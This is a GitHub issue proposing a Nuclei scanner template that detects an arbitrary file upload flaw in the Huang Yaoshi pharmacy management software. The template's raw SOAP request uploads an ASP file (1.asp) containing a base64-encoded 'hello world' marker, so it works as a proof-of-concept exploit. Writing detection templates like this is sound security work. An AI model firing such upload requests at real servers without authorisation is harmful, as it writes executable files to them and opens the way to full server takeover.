### ISSUE TITLE
huang-yaoshi-file-upload

### ISSUE THREAD

**Issue by 3th1cyuk1** [projectdiscovery/nuclei-templates#11489]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: huang-yaoshi-file-upload

info:
  name: Huang Yaoshi Pharmaceutical Management Software File Upload
  author: 3th1c_yuk1
  severity: critical
  description: |
    There is an arbitrary file upload vulnerability in UploadFile under the /XSDService.asmx file of the "Huang Pharmacist" drug management software. Attackers can upload arbitrary files and gain server privileges.
  reference:
    - https://github.com/advisories/GHSA-66fj-74pq-7rwx
    - https://github.com/Zerone0x00/CVE/blob/main/%E9%BB%84%E8%8D%AF%E5%B8%88%E8%8D%AF%E4%B8%9A%E7%AE%A1%E7%90%86%E8%BD%AF%E4%BB%B6/UploadFile%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md

http:
  - raw:
      - |
        POST /XSDService.asmx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=utf-8
        SOAPAction: "http://tempuri.org/UploadFile"
        Content-Length: 329

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <UploadFile xmlns="http://tempuri.org/">
              <filePath></filePath>
              <fileName>1.asp</fileName>
              <buffer>PCUgcmVzcG9uc2Uud3JpdGUoImhlbGxvIHdvcmxkIiklPg==</buffer>
              <Offset>1111</Offset>
            </UploadFile>
          </soap:Body>
        </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<?xml"
          - "UploadFileResult"
        condition: and
```

### Relevant dumped responses

```shell

```
